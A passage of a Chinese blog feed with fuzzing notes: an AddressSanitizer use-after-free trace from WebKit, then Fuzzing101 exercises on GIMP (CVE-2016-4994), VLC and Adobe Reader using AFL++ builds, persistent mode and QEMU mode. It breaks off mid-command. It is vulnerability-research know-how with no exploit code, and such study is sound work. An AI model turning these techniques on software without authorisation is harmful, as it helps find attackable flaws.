class="hljs-number">C::</span>JSGlobalObject*, JS<span class="hljs-number">C::</span>JSValue, JS<span class="hljs-number">C::</span>CallType, JS<span class="hljs-number">C::</span>CallData const&, JS<span class="hljs-number">C::</span>JSValue, JS<span class="hljs-number">C::</span>ArgList const&) Source/JavaScriptCore/runtime/CallData.cpp:<span class="hljs-number">59</span><br> #<span class="hljs-number">28</span> <span class="hljs-number">0</span>x7fbcfaf7459f in JS<span class="hljs-number">C::</span>call(JS<span class="hljs-number">C::</span>JSGlobalObject*, JS<span class="hljs-number">C::</span>JSValue, JS<span class="hljs-number">C::</span>CallType, JS<span class="hljs-number">C::</span>CallData const&, JS<span class="hljs-number">C::</span>JSValue, JS<span class="hljs-number">C::</span>ArgList const&, WT<span class="hljs-number">F::</span>NakedPtr<JS<span class="hljs-number">C::</span>Exception>&) Source/JavaScriptCore/runtime/CallData.cpp:<span class="hljs-number">66</span><br> #<span class="hljs-number">29</span> <span class="hljs-number">0</span>x7fbcfaf74a8f in JS<span class="hljs-number">C::</span>profiledCall(JS<span class="hljs-number">C::</span>JSGlobalObject*, JS<span class="hljs-number">C::</span>ProfilingReason, JS<span class="hljs-number">C::</span>JSValue, JS<span class="hljs-number">C::</span>CallType, JS<span class="hljs-number">C::</span>CallData const&, JS<span class="hljs-number">C::</span>JSValue, JS<span class="hljs-number">C::</span>ArgList const&, WT<span class="hljs-number">F::</span>NakedPtr<JS<span class="hljs-number">C::</span>Exception>&) Source/JavaScriptCore/runtime/CallData.cpp:<span class="hljs-number">87</span><br> #<span class="hljs-number">30</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">05133b63</span> in WebCor<span class="hljs-number">e::</span>JSExecStat<span class="hljs-number">e::</span>profiledCall(JS<span class="hljs-number">C::</span>JSGlobalObject*, JS<span class="hljs-number">C::</span>ProfilingReason, JS<span class="hljs-number">C::</span>JSValue, JS<span class="hljs-number">C::</span>CallType, JS<span class="hljs-number">C::</span>CallData const&, JS<span class="hljs-number">C::</span>JSValue, JS<span class="hljs-number">C::</span>ArgList const&, WT<span class="hljs-number">F::</span>NakedPtr<JS<span class="hljs-number">C::</span>Exception>&) Source/WebCore/bindings/js/JSExecState.h:<span class="hljs-number">73</span><br> #<span class="hljs-number">31</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">05133b63</span> in WebCor<span class="hljs-number">e::</span>JSEventListener<span class="hljs-number">::</span>handleEvent(WebCor<span class="hljs-number">e::</span>ScriptExecutionContext&, WebCor<span class="hljs-number">e::</span>Event&) Source/WebCore/bindings/js/JSEventListener.cpp:<span class="hljs-number">180</span><br> #<span class="hljs-number">32</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">05a70095</span> in WebCor<span class="hljs-number">e::</span>EventTarget<span class="hljs-number">::</span>innerInvokeEventListeners(WebCor<span class="hljs-number">e::</span>Event&, WT<span class="hljs-number">F::</span>Vector<WT<span class="hljs-number">F::</span>RefPtr<WebCor<span class="hljs-number">e::</span>RegisteredEventListener, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>RegisteredEventListener> >, <span class="hljs-number">1</span>ul, WT<span class="hljs-number">F::</span>CrashOnOverflow, <span class="hljs-number">16</span>ul, WT<span class="hljs-number">F::</span>FastMalloc>, WebCor<span class="hljs-number">e::</span>EventTarget<span class="hljs-number">::</span>EventInvokePhase) Source/WebCore/dom/EventTarget.cpp:<span class="hljs-number">308</span><br> #<span class="hljs-number">33</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">05a7a942</span> in WebCor<span class="hljs-number">e::</span>EventTarget<span class="hljs-number">::</span>fireEventListeners(WebCor<span class="hljs-number">e::</span>Event&, WebCor<span class="hljs-number">e::</span>EventTarget<span class="hljs-number">::</span>EventInvokePhase) Source/WebCore/dom/EventTarget.cpp:<span class="hljs-number">246</span><br> #<span class="hljs-number">34</span> <span class="hljs-number">0</span>x7fbd05b187fb in WebCor<span class="hljs-number">e::</span>No<span class="hljs-number">de::</span>handleLocalEvents(WebCor<span class="hljs-number">e::</span>Event&, WebCor<span class="hljs-number">e::</span>EventTarget<span class="hljs-number">::</span>EventInvokePhase) Source/WebCore/dom/Node.cpp:<span class="hljs-number">2363</span><br> #<span class="hljs-number">35</span> <span class="hljs-number">0</span>x7fbd05a56b86 in WebCor<span class="hljs-number">e::</span>EventContext<span class="hljs-number">::</span>handleLocalEvents(WebCor<span class="hljs-number">e::</span>Event&, WebCor<span class="hljs-number">e::</span>EventTarget<span class="hljs-number">::</span>EventInvokePhase) const Source/WebCore/dom/EventContext.cpp:<span class="hljs-number">55</span><br> #<span class="hljs-number">36</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">05a4e232</span> in dispatchEventInDOM Source/WebCore/dom/EventDispatcher.cpp:<span class="hljs-number">100</span><br> #<span class="hljs-number">37</span> <span class="hljs-number">0</span>x7fbd05a5c35f in WebCor<span class="hljs-number">e::</span>EventDispatcher<span class="hljs-number">::</span>dispatchEvent(WebCor<span class="hljs-number">e::</span>Node&, WebCor<span class="hljs-number">e::</span>Event&) Source/WebCore/dom/EventDispatcher.cpp:<span class="hljs-number">154</span><br> #<span class="hljs-number">38</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">05b0c7e8</span> in WebCor<span class="hljs-number">e::</span>No<span class="hljs-number">de::</span>dispatchEvent(WebCor<span class="hljs-number">e::</span>Event&) Source/WebCore/dom/Node.cpp:<span class="hljs-number">2373</span><br><br>SUMMARY: AddressSanitizer: heap-use-after-free DerivedSources/ForwardingHeaders/wtf/HashTable.h:<span class="hljs-number">585</span> in WT<span class="hljs-number">F::</span>HashTable<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>IdentityExtractor, WT<span class="hljs-number">F::</span>PtrHash<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > > ><span class="hljs-number">::</span>tableSizeMask() const<br>Shadow bytes around the buggy address:<br> <span class="hljs-number">0</span>x0c0e<span class="hljs-number">8000e8f0</span>: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fa fa<br> <span class="hljs-number">0</span>x0c0e<span class="hljs-number">8000e900</span>: fa fa fd fd fd fd fd fd fd fd fd fd fa fa fa fa<br> <span class="hljs-number">0</span>x0c0e<span class="hljs-number">8000e910</span>: fd fd fd fd fd fd fd fd fd fd fa fa fa fa fd fd<br> <span class="hljs-number">0</span>x0c0e<span class="hljs-number">8000e920</span>: fd fd fd fd fd fd fd fd fa fa fa fa fd fd fd fd<br> <span class="hljs-number">0</span>x0c0e<span class="hljs-number">8000e930</span>: fd fd fd fd fd fa fa fa fa fa fd fd fd fd fd fd<br>=><span class="hljs-number">0</span>x0c0e<span class="hljs-number">8000e940</span>: fd fd fd fd fa fa fa fa fd[fd]fd fd fd fd fd fd<br> <span class="hljs-number">0</span>x0c0e<span class="hljs-number">8000e950</span>: fd fd fa fa fa fa fd fd fd fd fd fd fd fd fd fd<br> <span class="hljs-number">0</span>x0c0e<span class="hljs-number">8000e960</span>: fa fa fa fa fd fd fd fd fd fd fd fd fd fa fa fa<br> <span class="hljs-number">0</span>x0c0e<span class="hljs-number">8000e970</span>: fa fa fd fd fd fd fd fd fd fd fd fd fa fa fa fa<br> <span class="hljs-number">0</span>x0c0e<span class="hljs-number">8000e980</span>: fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa<br> <span class="hljs-number">0</span>x0c0e<span class="hljs-number">8000e990</span>: fa fa fa fa fa fa fa fa fa fa fa fa fd fd fd fd<br>Shadow byte legend (one shadow byte represents <span class="hljs-number">8</span> application bytes):<br> Addressable: <span class="hljs-number">00</span><br> Partially addressable: <span class="hljs-number">01 02 03 04</span> <span class="hljs-number">05</span> <span class="hljs-number">06</span> <span class="hljs-number">07</span> <br> Heap left redzone: fa<br> Freed heap region: fd<br> Stack left redzone: f1<br> Stack mid redzone: f2<br> Stack right redzone: f3<br> Stack after return: f5<br> Stack use after scope: f8<br> Global redzone: f9<br> Global init order: f6<br> Poisoned by user: f7<br> Container overflow: fc<br> Array cookie: ac<br> Intra object redzone: bb<br> ASan internal: fe<br> Left alloca redzone: ca<br> Right alloca redzone: cb<br></code></pre></td></tr></table></figure>]]></content>
<tags>
<tag>Fuzz</tag>
<tag>JS Engine</tag>
</tags>
</entry>
<entry>
<title>Fuzzing101笔记 6~10</title>
<link href="/2022/09/08/Fuzzing101%E7%AC%94%E8%AE%B0-6-10/"/>
<url>/2022/09/08/Fuzzing101%E7%AC%94%E8%AE%B0-6-10/</url>
<content type="html"><![CDATA[<h1 id="Exercise-6-GIMP"><a href="#Exercise-6-GIMP" class="headerlink" title="Exercise 6 - GIMP"></a>Exercise 6 - GIMP</h1><p><a href="https://www.cvedetails.com/cve/CVE-2016-4994/"><strong>CVE-2016-4994</strong></a> in GIMP 2.8.16(Use-After-Free)</p><h2 id="更改源码使用persistent-mode"><a href="#更改源码使用persistent-mode" class="headerlink" title="更改源码使用persistent mode"></a>更改源码使用persistent mode</h2><p>这两种方法中二选一即可(不能全选)</p><ol><li>app/app.c 252行</li></ol><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-keyword">if</span> (run_loop){<br> <span class="hljs-meta">#<span class="hljs-keyword">ifdef</span> __AFL_COMPILER</span><br> <span class="hljs-keyword">while</span>(__AFL_LOOP(<span class="hljs-number">1000</span>))<br> {<br> file_open_from_command_line (gimp, filenames[i], as_new);<br> }<br> <span class="hljs-built_in">exit</span>(<span class="hljs-number">0</span>);<br> <span class="hljs-meta">#<span class="hljs-keyword">else</span></span><br> file_open_from_command_line (gimp, filenames[i], as_new);<br> <span class="hljs-meta">#<span class="hljs-keyword">endif</span></span><br><br> }<br></code></pre></td></tr></table></figure><ol><li>app/xcf/xccf.c 280行</li></ol><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">ifdef</span> __AFL_COMPILER</span><br> <span class="hljs-keyword">while</span>(__AFL_LOOP(<span class="hljs-number">10000</span>)){<br><span class="hljs-meta">#<span class="hljs-keyword">endif</span> </span><br><br> info.fp = g_fopen (filename, <span class="hljs-string">"rb"</span>);<br> <span class="hljs-keyword">if</span> (info.fp)……<br> <span class="hljs-keyword">if</span> (success)……<br><span class="hljs-meta">#<span class="hljs-keyword">ifdef</span> __AFL_COMPILER</span><br> }<br> <span class="hljs-built_in">exit</span>(<span class="hljs-number">0</span>);<br><span class="hljs-meta">#<span class="hljs-keyword">endif</span></span><br> gimp_unset_busy (gimp);<br> <span class="hljs-keyword">return</span> return_vals;<br></code></pre></td></tr></table></figure><p>一开始我还是手动一行一行地改,后来发现有patch命令,下载patch文件后一步到位</p><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">patch</span> gimp-<span class="hljs-number">2</span>.<span class="hljs-number">8</span>.<span class="hljs-number">16</span>/app/xcf/xcf.c -i persistent.patch<br></code></pre></td></tr></table></figure><h2 id="编译文件"><a href="#编译文件" class="headerlink" title="编译文件"></a>编译文件</h2><figure class="highlight jboss-cli"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs jboss-cli">CC=afl-clang-fast CXX=afl-clang-fast++ PKG_CONFIG_PATH=$PKG_CONFIG_PATH:$HOME/fuzz_target/fuzzing_gimp/gegl-0.2.0/ CFLAGS=<span class="hljs-string">"-fsanitize=address"</span> CXXFLAGS=<span class="hljs-string">"-fsanitize=address"</span> LDFLAGS=<span class="hljs-string">"-fsanitize=address"</span> <span class="hljs-string">./configure</span> <span class="hljs-params">--disable-gtktest</span> <span class="hljs-params">--disable-glibtest</span> <span class="hljs-params">--disable-alsatest</span> <span class="hljs-params">--disable-nls</span> <span class="hljs-params">--without-libtiff</span> <span class="hljs-params">--without-libjpeg</span> <span class="hljs-params">--without-bzip2</span> <span class="hljs-params">--without-gs</span> <span class="hljs-params">--without-libpng</span> <span class="hljs-params">--without-libmng</span> <span class="hljs-params">--without-libexif</span> <span class="hljs-params">--without-aa</span> <span class="hljs-params">--without-libxpm</span> <span class="hljs-params">--without-webkit</span> <span class="hljs-params">--without-librsvg</span> <span class="hljs-params">--without-print</span> <span class="hljs-params">--without-poppler</span> <span class="hljs-params">--without-cairo-pdf</span> <span class="hljs-params">--without-gvfs</span> <span class="hljs-params">--without-libcurl</span> <span class="hljs-params">--without-wmf</span> <span class="hljs-params">--without-libjasper</span> <span class="hljs-params">--without-alsa</span> <span class="hljs-params">--without-gudev</span> <span class="hljs-params">--disable-python</span> <span class="hljs-params">--enable-gimp-console</span> <span class="hljs-params">--without-mac-twain</span> <span class="hljs-params">--without-script-fu</span> <span class="hljs-params">--without-gudev</span> <span class="hljs-params">--without-dbus</span> <span class="hljs-params">--disable-mp</span> <span class="hljs-params">--without-linux-input</span> <span class="hljs-params">--without-xvfb-run</span> <span class="hljs-params">--with-gif-compression=none</span> <span class="hljs-params">--without-xmc</span> <span class="hljs-params">--with-shm=none</span> <span class="hljs-params">--enable-debug</span> <span class="hljs-params">--prefix=</span><span class="hljs-string">"$HOME/fuzz_target/fuzzing_gimp/install"</span><br><br>make -j$<span class="hljs-params">(nproc)</span><br>make install<br></code></pre></td></tr></table></figure><p>安装过程中也出了一些奇怪的报错,如果你遇到的和我一样可以参考我的解决方法</p><ol><li><p>error while loading shared libraries:</p><p>因为gegl库引发的报错,参考<a href="https://blog.csdn.net/wanxuexiang/article/details/84574660">解决方案</a></p></li><li><p>GLib-GObject-CRITICAL **: 15:19:52.668: g_param_spec_internal: assertion ‘is_valid_property_name (name)’ failed</p><p>因为gimp-console-2.8插件引发的报错,推测可能是因为编译时剔除了很多的依赖库,导致这些插件无法运行,删除即可。</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">rm .<span class="hljs-regexp">/install/</span>lib<span class="hljs-regexp">/gimp/</span><span class="hljs-number">2.0</span><span class="hljs-regexp">/plug-ins/</span>*<br></code></pre></td></tr></table></figure></li></ol><p>测试运行</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">.<span class="hljs-regexp">/install/</span>bin<span class="hljs-regexp">/gimp-console-2.8 ./i</span>n/SampleInput.xcf<br></code></pre></td></tr></table></figure><h2 id="fuzz"><a href="#fuzz" class="headerlink" title="fuzz"></a>fuzz</h2><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">ASAN_OPTIONS</span>=detect_leaks=<span class="hljs-number">0</span>,abort_on_error=<span class="hljs-number">1</span>,symbolize=<span class="hljs-number">0</span> afl-fuzz -i ./in -o ./afl_out -D -t <span class="hljs-number">500</span> -- ./install/bin/gimp-console-<span class="hljs-number">2</span>.<span class="hljs-number">8</span> --verbose -d -f @@<br></code></pre></td></tr></table></figure><ul><li>程序中存在无限循环,需要设置<code>-t</code>参数timelimit提高效率,具体超时时长自己调整(我的破服务器上干脆设置成了500)</li><li>打开<code>-D</code>deterministic mutations</li></ul><p><img src="/image-20220728172051449.png"></p><h2 id="调试"><a href="#调试" class="headerlink" title="调试"></a>调试</h2><p>因为开了ASAN,直接执行crash</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">.<span class="hljs-regexp">/install/</span>bin<span class="hljs-regexp">/gimp-console-2.8 --verbose -d -f ./</span>path<span class="hljs-regexp">/to/</span>crash<br></code></pre></td></tr></table></figure><p>虽然跑出来的crash不少,但奇怪的是并没跑出预期的堆溢出,只有其他的几个小问题被找出来了。</p><h3 id="crash1"><a href="#crash1" class="headerlink" title="crash1"></a>crash1</h3><p>最快出的一个crash</p><p><img src="/image-20220725173502736.png"></p><ul><li>报错信息: <code>AddressSanitizer: allocator is out of memory trying to allocate 0xab9e16000 bytes</code>,这显然一点也不像一个UAF会出的报错,这里是一个memory exhaustion bug(fuzzing101作者也在文中提到了)</li></ul><h3 id="crash2"><a href="#crash2" class="headerlink" title="crash2"></a>crash2</h3><p><img src="/image-20220728172405282.png"></p><ul><li>报错信息:<code>AddressSanitizer: SEGV on unknown address 0x00000000008c</code>,segmentation violation访问空指针</li></ul><p>太怪了,结果是没出最重要的堆漏洞,反而是作者提到的次要问题给找出来了,难道AFL++版本可能会有影响?</p><h1 id="Exercise-7-VLC-Media-Player"><a href="#Exercise-7-VLC-Media-Player" class="headerlink" title="Exercise 7 - VLC Media Player"></a>Exercise 7 - VLC Media Player</h1><p>看到那个运行时间,瞬间不想再跑一遍,直接上最新版,按照他的类似方法去跑</p><h2 id="partial-instrumentation"><a href="#partial-instrumentation" class="headerlink" title="partial instrumentation"></a>partial instrumentation</h2><p>由于VLC根据文件头部的字节判断文件格式,使用不同模块对文件进行处理。如果我们不限制代码覆盖率范围,会导致AFL尝试变更文件头,进入处理其他文件的模块分支,并惊喜地发现代码覆盖率确实增长了一些。然而文件基本格式不符会导致AFL效率下滑,比如MKV文件样本在处理AVI文件的模块中,大量格式错误会让代码覆盖率增长缓慢。</p><p>因此限制代码覆盖率的检测范围是必要的,通过设置AFL++提供的<code>AFL_LLVM_ALLOWLIST</code>参数为配置文件,可以只针对指定的文件名、函数名进行覆盖率检测。</p><p>AFL++支持两种配置文件的编写方式,可以结合使用。</p><ul><li><p>文件名</p><ul><li>文件在项目中的完整相对路径</li><li>单文件名,无路径(如果项目存在同名文件,可能会instrument其他文件)</li></ul></li><li><p>函数名</p><p><code>fun:</code> + 函数名,会自动忽略其中的空格</p></li></ul><p>注意:使用文件名虽然方便很多,但它不是最可靠的方式,且存在失效的可能,如果用函数名指定就必定能配置到对应函数(手动找还是挺麻烦的)</p><p>Fuzzing101作者使用的方式是两种方法的结合,那我也不确定单独一个方法能否正确instrument我需要的文件,所以我也采用这种方法添加了demux mp4 的相关内容。</p><h2 id="环境配置"><a href="#环境配置" class="headerlink" title="环境配置"></a>环境配置</h2><p>一些必要的依赖库</p><figure class="highlight q"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs q">apt-<span class="hljs-built_in">get</span> install libxcb-composite0-<span class="hljs-built_in">dev</span> libxcb-glx0-<span class="hljs-built_in">dev</span> libxcb-dri2<span class="hljs-number">-0</span>-<span class="hljs-built_in">dev</span> libxcb-xf86dri0-<span class="hljs-built_in">dev</span> libxcb-xinerama0-<span class="hljs-built_in">dev</span> libxcb-render-util0-<span class="hljs-built_in">dev</span><br>apt-<span class="hljs-built_in">get</span> install libxcb-xv0-<span class="hljs-built_in">dev</span><br>apt-<span class="hljs-built_in">get</span> install libxcb-randr0-<span class="hljs-built_in">dev</span><br>apt-<span class="hljs-built_in">get</span> install libasound2-<span class="hljs-built_in">dev</span><br>apt-<span class="hljs-built_in">get</span> install libvlc-<span class="hljs-built_in">dev</span><br></code></pre></td></tr></table></figure><h2 id="获取样本文件"><a href="#获取样本文件" class="headerlink" title="获取样本文件"></a>获取样本文件</h2><p>这里要测试的是mp4相关的解析, 从<a href="https://samples.ffmpeg.org/">ffmpeg samples repository</a>上找几个mp4样本(里面居然有片???),通过剪辑软件生成尽可能小的文件。我采用的方式是只截取视频的2帧,然后降低分辨率和图像质量,最终生成的视频文件大概能控制在5KB以内,勉强能接受。</p><h2 id="测试运行"><a href="#测试运行" class="headerlink" title="测试运行"></a>测试运行</h2><p>先正常编译试试能否运行</p><figure class="highlight jboss-cli"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs jboss-cli"><span class="hljs-string">./configure</span> <span class="hljs-params">--prefix=</span><span class="hljs-string">"$HOME/fuzz_real/fuzzing_vlc/vlc-3.0.17.4/install"</span> <span class="hljs-params">--disable-a52</span> <span class="hljs-params">--disable-lua</span> <span class="hljs-params">--disable-qt</span><br>make -j$<span class="hljs-params">(nproc)</span><br>make install<br><span class="hljs-string">./install/bin/vlc</span> <span class="hljs-params">--help</span><br></code></pre></td></tr></table></figure><h2 id="编译"><a href="#编译" class="headerlink" title="编译"></a>编译</h2><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><span class="hljs-attribute">CC</span>=afl-clang-fast <span class="hljs-attribute">CXX</span>=afl-clang-fast++ <span class="hljs-attribute">CFLAGS</span>=<span class="hljs-string">"-fsanitize=address"</span> <span class="hljs-attribute">CXXFLAGS</span>=<span class="hljs-string">"-fsanitize=address"</span> <span class="hljs-attribute">LDFLAGS</span>=<span class="hljs-string">"-fsanitize=address"</span> ./configure <span class="hljs-attribute">--prefix</span>=<span class="hljs-string">"<span class="hljs-variable">$HOME</span>/fuzz_real/fuzzing_vlc/vlc-3.0.17.4/install"</span> --disable-a52 --disable-lua --disable-qt<br><span class="hljs-attribute">AFL_LLVM_ALLOWLIST</span>=<span class="hljs-variable">$HOME</span>/fuzz_real/fuzzing_vlc/vlc-3.0.17.4/Partial_instrumentation <span class="hljs-attribute">ASAN_OPTIONS</span>=detect_leaks=0 make -j$(nproc) <span class="hljs-attribute">LDFLAGS</span>=<span class="hljs-string">"-fsanitize=address"</span><br></code></pre></td></tr></table></figure><p>这里要加ASAN_OPTIONS=detect_leaks=0,否则ASAN会给一个内存泄漏的警告,我也很想尝试patch一下,可惜调不出详细的报错路径。</p><p>编译harness,这里我直接用了他的harness(毕竟fuzz方法也差不多),不过他的harness里少了一个free,记得加上(不加似乎也不影响效果,但加了更好)。</p><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs routeros">patch -p0 vlc-demux-run.c fuzzing_harness.patch<br>make vlc-demux-<span class="hljs-built_in">run</span> -j$(nproc) <span class="hljs-attribute">LDFLAGS</span>=<span class="hljs-string">"-fsanitize=address"</span><br></code></pre></td></tr></table></figure><p>这里fuzz的函数应该是vlc专门开放出来fuzz的一个接口,不然每次初始化vlc会浪费大量时间。但这个harness也仅局限与对demux模块的调试。</p><h2 id="fuzz-1"><a href="#fuzz-1" class="headerlink" title="fuzz"></a>fuzz</h2><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs awk">afl-fuzz -t <span class="hljs-number">300</span> -m none -i .<span class="hljs-regexp">/afl_in -o ./</span>afl_out -x mp4.dict -D -M master -- .<span class="hljs-regexp">/vlc-3.0.17.4/</span>test/vlc-demux-run @@ <br>afl-fuzz -t <span class="hljs-number">300</span> -m none -i .<span class="hljs-regexp">/afl_in -o ./</span>afl_out -S slave1 -- .<span class="hljs-regexp">/vlc-3.0.17.4/</span>test/vlc-demux-run @@ <br></code></pre></td></tr></table></figure><p><img src="/image-20220801090808164.png"></p><p>结果在最新的VLC里跑出来一个小小的FPE,虽然只能在Debug模式下触发。</p><h1 id="Exercise-8-Adobe-Reader"><a href="#Exercise-8-Adobe-Reader" class="headerlink" title="Exercise 8 - Adobe Reader"></a>Exercise 8 - Adobe Reader</h1><p>这玩意已经很久没有维护了,我这里测试的是9.5.5-1版本</p><h2 id="安装afl-qemu-trace"><a href="#安装afl-qemu-trace" class="headerlink" title="安装afl-qemu-trace"></a>安装afl-qemu-trace</h2><p>首先要保证装的是i386的qemu,如果按照原来的方法安装,会导致后面的qemu mode无法运行,这个问题坑了我好几天。</p><p>题目里的代码是有问题的,这里放上修改后的安装方法,我已经在git上向原作者发起了pull request,如果作者看到了应该会修复吧(大概)</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs awk">sudo apt install ninja-build libc6-dev-i386<br>cd ~<span class="hljs-regexp">/Downloads/</span>AFLplusplus<span class="hljs-regexp">/qemu_mode/</span><br>CPU_TARGET=i386 ./build_qemu_support.sh<br>sudo make install<br></code></pre></td></tr></table></figure><p>正确安装的afl-qemu-trace</p><p><img src="/12.png" alt="安装效果"></p><h2 id="获取样本文件-1"><a href="#获取样本文件-1" class="headerlink" title="获取样本文件"></a>获取样本文件</h2><p>这里我从<a href="https://github.com/0ca/corpus_pdfs%E8%8E%B7%E5%8F%96%E6%A0%B7%E6%9C%AC%E6%96%87%E4%BB%B6%E3%80%82">https://github.com/0ca/corpus_pdfs获取样本文件。</a></p><p>先筛选出大小小于2KB的文件,再用afl-cmin对文件进行压缩,最终生成样本文件。</p><figure class="highlight gradle"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs gradle"><span class="hljs-keyword">find</span> corpus_pdfs<span class="hljs-regexp">/pdfs_all/</span> -<span class="hljs-keyword">size</span> -<span class="hljs-number">2</span>k -exec cp <span class="hljs-string">"{}"</span> pdf_corpus/ \;<br>ACRO_INSTALL_DIR=<span class="hljs-regexp">/opt/</span>Adobe<span class="hljs-regexp">/Reader9/</span>Reader ACRO_CONFIG=intellinux LD_LIBRARY_PATH=$LD_LIBRARY_PATH:<span class="hljs-string">'/opt/Adobe/Reader9/Reader/intellinux/lib'</span> afl-cmin -Q -i .<span class="hljs-regexp">/afl_in/</span> -o .<span class="hljs-regexp">/afl_in1/</span> -t <span class="hljs-number">2000</span> -- <span class="hljs-regexp">/opt/</span>Adobe<span class="hljs-regexp">/Reader9/</span>Reader<span class="hljs-regexp">/intellinux/</span>bin/acroread -toPostScript @@<br></code></pre></td></tr></table></figure><ul><li>afl-cmin是AFL++专门用来压缩样本的工具,调用方法和afl-fuzz基本一样,但是他只执行一轮。</li></ul><h2 id="分析程序"><a href="#分析程序" class="headerlink" title="分析程序"></a>分析程序</h2><p>使用valgrind和kcachegrind模块对程序进行分析</p><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs routeros">sudo apt-<span class="hljs-built_in">get</span> install valgrind<br>sudo apt-<span class="hljs-built_in">get</span> install kcachegrind<br><span class="hljs-attribute">ACRO_INSTALL_DIR</span>=/opt/Adobe/Reader9/Reader <span class="hljs-attribute">ACRO_CONFIG</span>=intellinux <span class="hljs-attribute">LD_LIBRARY_PATH</span>=<span class="hljs-variable">$LD_LIBRARY_PATH</span>:'/opt/Adobe/Reader9/Reader/intellinux/lib' valgrind <span class="hljs-attribute">--tool</span>=callgrind /opt/Adobe/Reader9/Reader/intellinux/bin/acroread -toPostScript [samplePDF]<br></code></pre></td></tr></table></figure><p>直接打开生成的callgrind文件进行查看</p><p><img src="/image-20220816152828217.png"></p><p>切换到call graph视图看得比较清楚,左侧比较重要的参数有</p><ul><li>incl.是inclusive的简写,表示的是该函数及其内容所有函数的内容所占用的CPU周期数百分比</li><li>self,表示该函数中除去其他函数的内容所占用的周期数</li><li>called,表示该函数在运行中的调用次数</li></ul><p>实际测试下来只有原文里选择的<code>0x085478AC</code>稳定性比较好,再往下的话稳定性都很差,不适合作为循环入口。</p><h2 id="fuzz-2"><a href="#fuzz-2" class="headerlink" title="fuzz"></a>fuzz</h2><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">AFL_QEMU_PERSISTENT_ADDR=<span class="hljs-number">0</span>x085478AC AFL_QEMU_PERSISTENT_GPR=<span class="hljs-number">1</span> ACRO_INSTALL_DIR=<span class="hljs-regexp">/opt/</span>Adobe<span class="hljs-regexp">/Reader9/</span>Reader ACRO_CONFIG=intellinux LD_LIBRARY_PATH=<span class="hljs-variable">$LD_LIBRARY_PATH</span>:<span class="hljs-string">'/opt/Adobe/Reader9/Reader/intellinux/lib'</span> afl-fuzz -Q -i 